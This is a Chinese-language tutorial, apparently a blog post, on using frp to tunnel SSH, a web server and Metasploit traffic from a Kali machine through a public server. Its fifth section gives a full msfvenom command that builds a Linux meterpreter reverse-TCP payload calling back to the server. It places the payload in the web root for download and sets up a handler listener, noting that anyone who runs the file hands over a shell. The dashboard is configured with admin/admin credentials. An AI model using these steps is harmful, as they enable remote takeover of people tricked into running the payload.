一个是服务器和客户机的连接
一个是隧道
文章目录
前言
提示:
123
一、下载frp
wget https://github.com/fatedier/frp/releases/download/v0.42.0/frp_0.42.0_linux_amd64.tar.gz
解压 tar.gz
tar -xf fei.tar.gz
二、建立连接
1.服务器配置 frps.ini
[common]
bind_port = 7000
2.kali配置 frpc.ini
[common]
server_addr = 43.138.57.47
server_port = 7000
三、建立ssh连接
1.服务器配置 frps.ini
[common]
bind_port = 7000
2.kali配置 frpc.ini
[common]
server_addr = 43.138.57.47
server_port = 7000
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
四、建立web内网映射 并且 建立仪表盘
把kali的apache2网页通过外网映射出去
1.服务器配置 frps.ini
[common]
bind_port = 7000
vhost_http_port = 80 #http默认是80
dashboard_port = 7500 #仪表盘`端口`
dashboard_user = admin #仪表盘`账号`
dashboard_pwd = admin #仪表盘`密码`
2.kali配置 frpc.ini
[common]
server_addr = 43.138.57.47
server_port = 7000
[web]
type = http
local_port = 80
custom_domains = zhaofeixiang.xyz
五、 配置 MSF木马 接收来自公网的 shell
1.服务器配置 frps.ini
[common]
bind_port = 7000
2.kali配置 frpc.ini
[common]
server_addr = 43.138.57.47
server_port = 7000
[msf]
type = tcp
local_port = 4444
local_ip = 192.168.0.55
remote_port = 8000
3.生成 payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=43.138.57.47 LPORT=8000 -b "\x00" -f elf -o /var/www/html/feixiang
4.启动监听 通过handler
模块
use exploit/multi/handler
5.设置payload
4444端口要开启
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.55
set LPORT 4444
run
6.然后就是谁运行了 feixiang 文件 我这边就能监听到 获取他的shell
--------------容易遇到的问题--------------
1.kali要开启 ssh
2.服务器要开启 7000防火墙端口
3.端口没开
4.web服务没开
5.防火墙端口
添加 firewall-cmd --zone=public --add-port=80/tcp --permanent
(–permanent永久生效,没有此参数重启后失效)
重新载入 firewall-cmd --reload
查看 firewall-cmd --zone=public --query-port=80/tcp
删除 firewall-cmd --zone=public --remove-port=80/tcp --permanent